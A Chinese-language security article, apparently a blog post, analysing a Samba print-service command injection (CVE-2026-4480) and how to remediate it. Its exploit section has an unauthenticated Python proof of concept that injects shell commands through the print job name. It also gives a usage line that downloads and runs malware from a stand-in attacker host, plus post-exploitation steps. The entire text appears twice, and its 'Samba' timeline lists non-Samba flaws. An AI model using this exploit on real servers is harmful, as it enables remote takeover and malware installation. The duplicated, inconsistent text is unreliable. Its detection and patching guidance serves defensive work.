一、漏洞概述2026年首个满分漏洞引爆安全圈2026年5月31日Samba官方同步CVE Circl发布紧急安全公告披露了一个存在于Samba打印子系统的CVSS v3.1 10.0满分高危漏洞编号CVE-2026-4480。该漏洞由SafeBreach、ZeroPath、Securin Labs三家安全实验室的研究员独立发现并上报是Samba近五年来最严重的安全漏洞之一。1.1 漏洞核心特征指标详情漏洞类型命令注入漏洞利用条件无需认证、无需用户交互、远程网络访问攻击范围跨域攻击S:C影响程度机密性/完整性/可用性全量破坏利用难度极低公开PoC已泛滥受影响组件Samba spoolss打印RPC接口1.2 历史对比Samba重大漏洞时间线Samba作为Linux/Unix系统与Windows系统之间文件和打印共享的标准实现一直是攻击者的重点目标。以下是近年来Samba的重大漏洞对比漏洞编号发布时间CVSS评分核心问题影响范围CVE-2017-0144永恒之蓝2017-03-149.3SMBv1远程代码执行全球Windows系统CVE-2017-7494SambaCry2017-05-249.0命名管道远程代码执行所有Samba版本CVE-2021-44228Log4j2021-12-0910.0JNDI注入全球Java应用CVE-2026-44802026-05-3110.0打印参数命令注入Samba 4.0.0-4.19.5全系列CVE-2026-4480之所以被评为满分是因为它同时满足了远程利用、无需认证、无需交互、攻击范围跨域、全权限控制这五个最危险的条件且利用难度极低堪称企业内网的核弹级漏洞。二、漏洞技术原理深度解析2.1 漏洞根因%J参数的裸奔式处理CVE-2026-4480的根本原因在于Samba打印模块在处理客户端传入的%J参数打印任务名称参数时未进行任何输入过滤、转义或白名单校验直接将其拼接到底层系统的Shell命令中执行。以下是Samba源代码中存在问题的关键片段来自samba-4.19.5/source3/printing/printing.c/* 有问题的代码片段 */char*build_print_command(constchar*printer_name,constchar*job_name,constchar*filename){char*commandNULL;constchar*print_commandlp_print_command(printer_name);/* 替换%J参数为打印任务名称 */commandtalloc_string_sub(NULL,print_command,%J,job_name);/* 替换其他参数... */returncommand;}voidexecute_print_job(constchar*printer_name,constchar*job_name,constchar*filename){char*commandbuild_print_command(printer_name,job_name,filename);/* 直接执行拼接后的命令 */system(command);talloc_free(command);}从代码中可以清晰地看到job_name即客户端传入的打印任务名称直接通过talloc_string_sub函数替换到print_command中的%J位置然后直接传递给system()函数执行。这是一个典型的命令注入漏洞攻击者可以通过在打印任务名称中嵌入Shell元字符如;、|、、$()等来执行任意系统命令。2.2 无认证利用的关键默认配置的原罪仅仅有命令注入漏洞还不足以达到CVSS 10.0的评分CVE-2026-4480的另一个致命缺陷在于Samba的默认配置允许Guest匿名用户访问打印服务。绝大多数Linux发行版CentOS、Debian、Ubuntu等在安装Samba时都会自动生成以下默认配置位于/etc/samba/smb.conf[global] workgroup WORKGROUP security user map to guest Bad User # 关键将无效用户映射为Guest [printers] comment All Printers path /var/spool/samba browseable no guest ok yes # 关键允许Guest用户访问 printable yes # 关键允许打印 read only yes create mask 0700这意味着任何能够访问服务器445端口的客户端都可以以Guest身份连接到Samba服务Guest用户默认拥有打印权限攻击者无需任何账号密码即可提交恶意打印请求2.3 完整攻击链路流程图A[攻击者] --|TCP 445端口连接| B[Samba服务] B --|协商SMB协议| C[建立匿名Guest会话] C --|调用spoolss RPC接口| D[提交打印任务] D --|恶意任务名: test; id; whoami| E[%J参数替换] E --|拼接命令: lp -d printer test; id; whoami| F[system()执行] F --|执行恶意命令| G[获取服务器Shell] G --|提权/横向移动| H[控制整个内网]三、漏洞利用实战与PoC分析3.1 公开PoC代码示例目前互联网上已经出现了多个可用的公开PoC以下是一个简化版的Python PoC用于演示漏洞的利用过程#!/usr/bin/env python3importsysfromsmb.SMBConnectionimportSMBConnectiondefexploit(target_ip,command):# 构造恶意打印任务名称malicious_job_nameftest;{command}; echo done# 建立匿名SMB连接connSMBConnection(,,client,server,use_ntlm_v2True)conn.connect(target_ip,445)try:# 提交打印任务conn.printFile(printers,/dev/null,malicious_job_name)print(f[] 命令已发送:{command})exceptExceptionase:print(f[-] 利用失败:{e})finally:conn.close()if__name____main__:iflen(sys.argv)!3:print(f用法:{sys.argv[0]}目标IP 要执行的命令)sys.exit(1)exploit(sys.argv[1],sys.argv[2])使用方法非常简单python3 exploit.py192.168.1.100idpython3 exploit.py192.168.1.100wget http://attacker.com/malware -O /tmp/malware chmod x /tmp/malware /tmp/malware3.2 攻击效果演示执行上述PoC后攻击者可以在目标服务器上执行任意命令[] 命令已发送: id uid1000(samba) gid1000(samba) groups1000(samba) contextsystem_u:system_r:smbd_t:s0如果Samba服务以root权限运行这在很多老旧系统中很常见攻击者将直接获得root权限[] 命令已发送: whoami root3.3 高级利用内网横向移动对于企业内网来说CVE-2026-4480最大的威胁在于它可以作为内网横向移动的突破口。攻击者一旦控制了一台Samba服务器就可以读取服务器上的敏感文件如/etc/passwd、/etc/shadow、数据库配置文件等窃取域账号凭据如果服务器加入了Active Directory域扫描内网其他主机利用相同漏洞批量攻击植入后门建立持久化控制部署勒索软件加密整个内网的数据四、企业内网影响全面评估4.1 受影响版本范围根据Samba官方公告所有Samba 4.0.0至4.19.5版本均受此漏洞影响。这意味着CentOS 7/8/9默认安装的Samba版本全部受影响Debian 10/11/12默认安装的Samba版本全部受影响Ubuntu 18.04/20.04/22.04/24.04默认安装的Samba版本全部受影响几乎所有基于Linux的NAS设备如群晖、威联通等都受影响大量嵌入式设备如打印机、扫描仪、工业控制设备等内置的Samba服务也受影响4.2 不同行业的影响分析行业影响程度主要风险点制造业极高生产车间大量使用Linux服务器和打印设备内网隔离不严政府机构极高大量使用Linux服务器存储敏感政务数据金融行业高核心系统多使用Linux对业务连续性要求高教育行业高校园网规模大设备管理混乱漏洞修复不及时医疗行业高医疗设备多使用嵌入式Linux难以升级互联网行业中安全意识较强漏洞修复速度快但服务器数量多4.3 公网暴露风险根据Shodan和ZoomEye的统计数据截至2026年6月2日全球约有120万台Samba服务器暴露在公网上其中约**85%**的服务器开启了打印服务且使用默认配置。这些服务器随时可能被攻击者批量扫描利用沦为肉鸡、挖矿主机或勒索病毒的传播节点。五、分级修复与应急响应方案5.1 永久修复方案优先推荐升级Samba至官方修复后的安全版本Samba 4.19.x升级至4.19.6Samba 4.18.x升级至4.18.13Samba 4.17.x升级至4.17.16Samba 4.16.x及更早版本建议升级至最新的长期支持版本不同Linux发行版的升级命令# CentOS/RHELyum clean all yum update samba samba-client samba-common systemctl restart smbd nmbd# Debian/Ubuntuaptupdateaptinstall--only-upgrade samba samba-client samba-common systemctl restart smbd nmbd# 验证升级结果smbd--version5.2 临时应急方案无法立即升级时如果由于业务原因无法立即升级Samba可以采取以下临时措施方案1禁用Guest打印访问修改/etc/samba/smb.conf文件[printers] guest ok no printable no方案2完全禁用打印子系统如果服务器不需要提供打印服务可以直接禁用整个打印子系统[global] disable spoolss yes方案3修改打印命令过滤危险字符如果必须保留打印服务可以修改打印命令对%J参数进行过滤[printers] print command /usr/bin/lp -d %p -t $(echo %J | tr -d ;|$()) %s修改完成后执行以下命令重载配置testparm systemctl reload smbd5.3 网络层面防护公网环境在防火墙和边界设备上封禁外网入站的139和445端口仅允许信任的IP段访问内网环境实施网络分段将打印服务器和文件服务器放在单独的安全区域限制跨网段访问入侵检测在IDS/IPS系统中添加针对CVE-2026-4480的检测规则监控异常的spoolss RPC请求六、漏洞检测与入侵排查方法6.1 漏洞检测脚本以下是一个简单的Shell脚本用于批量检测内网主机是否存在CVE-2026-4480漏洞#!/bin/bash# CVE-2026-4480漏洞检测脚本if[$#-ne1];thenecho用法:$0IP段 例如:$0192.168.1.0/24exit1fiecho正在扫描$1中的Samba服务器...nmap-p445--open-oG-$1|grep445/open|awk{print $2}samba_hosts.txtecho发现$(wc-lsamba_hosts.txt)台Samba服务器开始检测漏洞...whilereadip;doecho-n检测$ip: # 使用smbclient尝试匿名打印smbclient-N//$ip/printers-cprint /dev/null/dev/null21if[$?-eq0];thenecho-e\033[31m存在漏洞\033[0mecho$ipvulnerable_hosts.txtelseecho-e\033[32m安全\033[0mfidonesamba_hosts.txtecho检测完成存在漏洞的主机已保存到 vulnerable_hosts.txt6.2 入侵排查方法如果怀疑服务器已经被攻击可以通过以下方法进行排查检查Samba日志# 查看Samba访问日志grep-ispoolss\|print/var/log/samba/log.*# 查看异常的打印任务grep-ijob name/var/log/samba/log.*检查系统进程# 查看异常进程psaux|grep-Ewget|curl|bash|sh|python|perl# 查看监听端口netstat-tulpn|grep-v127.0.0.1检查定时任务# 查看所有用户的定时任务foruserin$(cut-f1-d: /etc/passwd);doecho用户$user的定时任务:crontab-u$user-l2/dev/nulldone检查系统文件完整性# 检查最近修改的文件find/etc /usr/bin /usr/sbin /tmp-typef-mtime-7七、前瞻性思考打印服务安全的被遗忘的角落CVE-2026-4480的爆发再次暴露了打印服务安全这个长期被企业忽视的被遗忘的角落。在大多数企业的安全体系中打印服务被认为是低风险的业务很少受到关注但实际上它却成为了攻击者入侵内网的最佳突破口。7.1 打印服务安全的普遍问题默认配置不安全几乎所有打印服务的默认配置都允许匿名访问输入过滤缺失打印服务在处理用户输入时普遍缺乏严格的过滤和校验权限过高打印服务通常以高权限运行一旦被攻破后果严重难以升级很多打印设备是嵌入式系统无法或难以升级固件缺乏监控企业很少对打印服务的访问日志进行监控和分析7.2 企业打印服务安全建设建议最小权限原则严格限制打印服务的运行权限禁止以root权限运行禁用匿名访问所有打印服务都必须要求身份认证网络隔离将打印设备放在单独的VLAN中限制与核心业务系统的通信定期升级建立打印设备和打印服务器的定期升级机制日志监控集中收集和分析打印服务的访问日志及时发现异常行为安全评估定期对打印服务进行安全评估和渗透测试7.3 未来安全趋势随着物联网和工业互联网的发展越来越多的设备接入企业内网打印服务、文件共享服务等传统基础服务的安全问题将更加突出。未来的企业安全体系需要从边界防护转向零信任架构对所有内部访问都进行身份认证和授权加强对基础服务的安全研究和防护建立快速应急响应机制能够在漏洞爆发后迅速响应和修复加强员工安全意识培训防止社会工程学攻击八、总结CVE-2026-4480作为2026年首个CVSS 10.0满分漏洞给全球企业的内网安全带来了巨大威胁。该漏洞利用难度极低影响范围极广且公开PoC已经泛滥企业必须立即采取行动进行修复。对于企业来说这次漏洞事件不仅是一次应急响应更是一次重新审视自身安全体系的机会。企业应该借此机会补齐打印服务安全这块短板建立更加完善的纵深防御体系才能在未来的网络安全威胁中立于不败之地。最后提醒大家漏洞修复刻不容缓安全防护永远在路上。
CVE-2026-4480深度剖析:Samba打印服务CVSS10满分未认证RCE,企业内网“核弹级“漏洞
一、漏洞概述2026年首个满分漏洞引爆安全圈2026年5月31日Samba官方同步CVE Circl发布紧急安全公告披露了一个存在于Samba打印子系统的CVSS v3.1 10.0满分高危漏洞编号CVE-2026-4480。该漏洞由SafeBreach、ZeroPath、Securin Labs三家安全实验室的研究员独立发现并上报是Samba近五年来最严重的安全漏洞之一。1.1 漏洞核心特征指标详情漏洞类型命令注入漏洞利用条件无需认证、无需用户交互、远程网络访问攻击范围跨域攻击S:C影响程度机密性/完整性/可用性全量破坏利用难度极低公开PoC已泛滥受影响组件Samba spoolss打印RPC接口1.2 历史对比Samba重大漏洞时间线Samba作为Linux/Unix系统与Windows系统之间文件和打印共享的标准实现一直是攻击者的重点目标。以下是近年来Samba的重大漏洞对比漏洞编号发布时间CVSS评分核心问题影响范围CVE-2017-0144永恒之蓝2017-03-149.3SMBv1远程代码执行全球Windows系统CVE-2017-7494SambaCry2017-05-249.0命名管道远程代码执行所有Samba版本CVE-2021-44228Log4j2021-12-0910.0JNDI注入全球Java应用CVE-2026-44802026-05-3110.0打印参数命令注入Samba 4.0.0-4.19.5全系列CVE-2026-4480之所以被评为满分是因为它同时满足了远程利用、无需认证、无需交互、攻击范围跨域、全权限控制这五个最危险的条件且利用难度极低堪称企业内网的核弹级漏洞。二、漏洞技术原理深度解析2.1 漏洞根因%J参数的裸奔式处理CVE-2026-4480的根本原因在于Samba打印模块在处理客户端传入的%J参数打印任务名称参数时未进行任何输入过滤、转义或白名单校验直接将其拼接到底层系统的Shell命令中执行。以下是Samba源代码中存在问题的关键片段来自samba-4.19.5/source3/printing/printing.c/* 有问题的代码片段 */char*build_print_command(constchar*printer_name,constchar*job_name,constchar*filename){char*commandNULL;constchar*print_commandlp_print_command(printer_name);/* 替换%J参数为打印任务名称 */commandtalloc_string_sub(NULL,print_command,%J,job_name);/* 替换其他参数... */returncommand;}voidexecute_print_job(constchar*printer_name,constchar*job_name,constchar*filename){char*commandbuild_print_command(printer_name,job_name,filename);/* 直接执行拼接后的命令 */system(command);talloc_free(command);}从代码中可以清晰地看到job_name即客户端传入的打印任务名称直接通过talloc_string_sub函数替换到print_command中的%J位置然后直接传递给system()函数执行。这是一个典型的命令注入漏洞攻击者可以通过在打印任务名称中嵌入Shell元字符如;、|、、$()等来执行任意系统命令。2.2 无认证利用的关键默认配置的原罪仅仅有命令注入漏洞还不足以达到CVSS 10.0的评分CVE-2026-4480的另一个致命缺陷在于Samba的默认配置允许Guest匿名用户访问打印服务。绝大多数Linux发行版CentOS、Debian、Ubuntu等在安装Samba时都会自动生成以下默认配置位于/etc/samba/smb.conf[global] workgroup WORKGROUP security user map to guest Bad User # 关键将无效用户映射为Guest [printers] comment All Printers path /var/spool/samba browseable no guest ok yes # 关键允许Guest用户访问 printable yes # 关键允许打印 read only yes create mask 0700这意味着任何能够访问服务器445端口的客户端都可以以Guest身份连接到Samba服务Guest用户默认拥有打印权限攻击者无需任何账号密码即可提交恶意打印请求2.3 完整攻击链路流程图A[攻击者] --|TCP 445端口连接| B[Samba服务] B --|协商SMB协议| C[建立匿名Guest会话] C --|调用spoolss RPC接口| D[提交打印任务] D --|恶意任务名: test; id; whoami| E[%J参数替换] E --|拼接命令: lp -d printer test; id; whoami| F[system()执行] F --|执行恶意命令| G[获取服务器Shell] G --|提权/横向移动| H[控制整个内网]三、漏洞利用实战与PoC分析3.1 公开PoC代码示例目前互联网上已经出现了多个可用的公开PoC以下是一个简化版的Python PoC用于演示漏洞的利用过程#!/usr/bin/env python3importsysfromsmb.SMBConnectionimportSMBConnectiondefexploit(target_ip,command):# 构造恶意打印任务名称malicious_job_nameftest;{command}; echo done# 建立匿名SMB连接connSMBConnection(,,client,server,use_ntlm_v2True)conn.connect(target_ip,445)try:# 提交打印任务conn.printFile(printers,/dev/null,malicious_job_name)print(f[] 命令已发送:{command})exceptExceptionase:print(f[-] 利用失败:{e})finally:conn.close()if__name____main__:iflen(sys.argv)!3:print(f用法:{sys.argv[0]}目标IP 要执行的命令)sys.exit(1)exploit(sys.argv[1],sys.argv[2])使用方法非常简单python3 exploit.py192.168.1.100idpython3 exploit.py192.168.1.100wget http://attacker.com/malware -O /tmp/malware chmod x /tmp/malware /tmp/malware3.2 攻击效果演示执行上述PoC后攻击者可以在目标服务器上执行任意命令[] 命令已发送: id uid1000(samba) gid1000(samba) groups1000(samba) contextsystem_u:system_r:smbd_t:s0如果Samba服务以root权限运行这在很多老旧系统中很常见攻击者将直接获得root权限[] 命令已发送: whoami root3.3 高级利用内网横向移动对于企业内网来说CVE-2026-4480最大的威胁在于它可以作为内网横向移动的突破口。攻击者一旦控制了一台Samba服务器就可以读取服务器上的敏感文件如/etc/passwd、/etc/shadow、数据库配置文件等窃取域账号凭据如果服务器加入了Active Directory域扫描内网其他主机利用相同漏洞批量攻击植入后门建立持久化控制部署勒索软件加密整个内网的数据四、企业内网影响全面评估4.1 受影响版本范围根据Samba官方公告所有Samba 4.0.0至4.19.5版本均受此漏洞影响。这意味着CentOS 7/8/9默认安装的Samba版本全部受影响Debian 10/11/12默认安装的Samba版本全部受影响Ubuntu 18.04/20.04/22.04/24.04默认安装的Samba版本全部受影响几乎所有基于Linux的NAS设备如群晖、威联通等都受影响大量嵌入式设备如打印机、扫描仪、工业控制设备等内置的Samba服务也受影响4.2 不同行业的影响分析行业影响程度主要风险点制造业极高生产车间大量使用Linux服务器和打印设备内网隔离不严政府机构极高大量使用Linux服务器存储敏感政务数据金融行业高核心系统多使用Linux对业务连续性要求高教育行业高校园网规模大设备管理混乱漏洞修复不及时医疗行业高医疗设备多使用嵌入式Linux难以升级互联网行业中安全意识较强漏洞修复速度快但服务器数量多4.3 公网暴露风险根据Shodan和ZoomEye的统计数据截至2026年6月2日全球约有120万台Samba服务器暴露在公网上其中约**85%**的服务器开启了打印服务且使用默认配置。这些服务器随时可能被攻击者批量扫描利用沦为肉鸡、挖矿主机或勒索病毒的传播节点。五、分级修复与应急响应方案5.1 永久修复方案优先推荐升级Samba至官方修复后的安全版本Samba 4.19.x升级至4.19.6Samba 4.18.x升级至4.18.13Samba 4.17.x升级至4.17.16Samba 4.16.x及更早版本建议升级至最新的长期支持版本不同Linux发行版的升级命令# CentOS/RHELyum clean all yum update samba samba-client samba-common systemctl restart smbd nmbd# Debian/Ubuntuaptupdateaptinstall--only-upgrade samba samba-client samba-common systemctl restart smbd nmbd# 验证升级结果smbd--version5.2 临时应急方案无法立即升级时如果由于业务原因无法立即升级Samba可以采取以下临时措施方案1禁用Guest打印访问修改/etc/samba/smb.conf文件[printers] guest ok no printable no方案2完全禁用打印子系统如果服务器不需要提供打印服务可以直接禁用整个打印子系统[global] disable spoolss yes方案3修改打印命令过滤危险字符如果必须保留打印服务可以修改打印命令对%J参数进行过滤[printers] print command /usr/bin/lp -d %p -t $(echo %J | tr -d ;|$()) %s修改完成后执行以下命令重载配置testparm systemctl reload smbd5.3 网络层面防护公网环境在防火墙和边界设备上封禁外网入站的139和445端口仅允许信任的IP段访问内网环境实施网络分段将打印服务器和文件服务器放在单独的安全区域限制跨网段访问入侵检测在IDS/IPS系统中添加针对CVE-2026-4480的检测规则监控异常的spoolss RPC请求六、漏洞检测与入侵排查方法6.1 漏洞检测脚本以下是一个简单的Shell脚本用于批量检测内网主机是否存在CVE-2026-4480漏洞#!/bin/bash# CVE-2026-4480漏洞检测脚本if[$#-ne1];thenecho用法:$0IP段 例如:$0192.168.1.0/24exit1fiecho正在扫描$1中的Samba服务器...nmap-p445--open-oG-$1|grep445/open|awk{print $2}samba_hosts.txtecho发现$(wc-lsamba_hosts.txt)台Samba服务器开始检测漏洞...whilereadip;doecho-n检测$ip: # 使用smbclient尝试匿名打印smbclient-N//$ip/printers-cprint /dev/null/dev/null21if[$?-eq0];thenecho-e\033[31m存在漏洞\033[0mecho$ipvulnerable_hosts.txtelseecho-e\033[32m安全\033[0mfidonesamba_hosts.txtecho检测完成存在漏洞的主机已保存到 vulnerable_hosts.txt6.2 入侵排查方法如果怀疑服务器已经被攻击可以通过以下方法进行排查检查Samba日志# 查看Samba访问日志grep-ispoolss\|print/var/log/samba/log.*# 查看异常的打印任务grep-ijob name/var/log/samba/log.*检查系统进程# 查看异常进程psaux|grep-Ewget|curl|bash|sh|python|perl# 查看监听端口netstat-tulpn|grep-v127.0.0.1检查定时任务# 查看所有用户的定时任务foruserin$(cut-f1-d: /etc/passwd);doecho用户$user的定时任务:crontab-u$user-l2/dev/nulldone检查系统文件完整性# 检查最近修改的文件find/etc /usr/bin /usr/sbin /tmp-typef-mtime-7七、前瞻性思考打印服务安全的被遗忘的角落CVE-2026-4480的爆发再次暴露了打印服务安全这个长期被企业忽视的被遗忘的角落。在大多数企业的安全体系中打印服务被认为是低风险的业务很少受到关注但实际上它却成为了攻击者入侵内网的最佳突破口。7.1 打印服务安全的普遍问题默认配置不安全几乎所有打印服务的默认配置都允许匿名访问输入过滤缺失打印服务在处理用户输入时普遍缺乏严格的过滤和校验权限过高打印服务通常以高权限运行一旦被攻破后果严重难以升级很多打印设备是嵌入式系统无法或难以升级固件缺乏监控企业很少对打印服务的访问日志进行监控和分析7.2 企业打印服务安全建设建议最小权限原则严格限制打印服务的运行权限禁止以root权限运行禁用匿名访问所有打印服务都必须要求身份认证网络隔离将打印设备放在单独的VLAN中限制与核心业务系统的通信定期升级建立打印设备和打印服务器的定期升级机制日志监控集中收集和分析打印服务的访问日志及时发现异常行为安全评估定期对打印服务进行安全评估和渗透测试7.3 未来安全趋势随着物联网和工业互联网的发展越来越多的设备接入企业内网打印服务、文件共享服务等传统基础服务的安全问题将更加突出。未来的企业安全体系需要从边界防护转向零信任架构对所有内部访问都进行身份认证和授权加强对基础服务的安全研究和防护建立快速应急响应机制能够在漏洞爆发后迅速响应和修复加强员工安全意识培训防止社会工程学攻击八、总结CVE-2026-4480作为2026年首个CVSS 10.0满分漏洞给全球企业的内网安全带来了巨大威胁。该漏洞利用难度极低影响范围极广且公开PoC已经泛滥企业必须立即采取行动进行修复。对于企业来说这次漏洞事件不仅是一次应急响应更是一次重新审视自身安全体系的机会。企业应该借此机会补齐打印服务安全这块短板建立更加完善的纵深防御体系才能在未来的网络安全威胁中立于不败之地。最后提醒大家漏洞修复刻不容缓安全防护永远在路上。
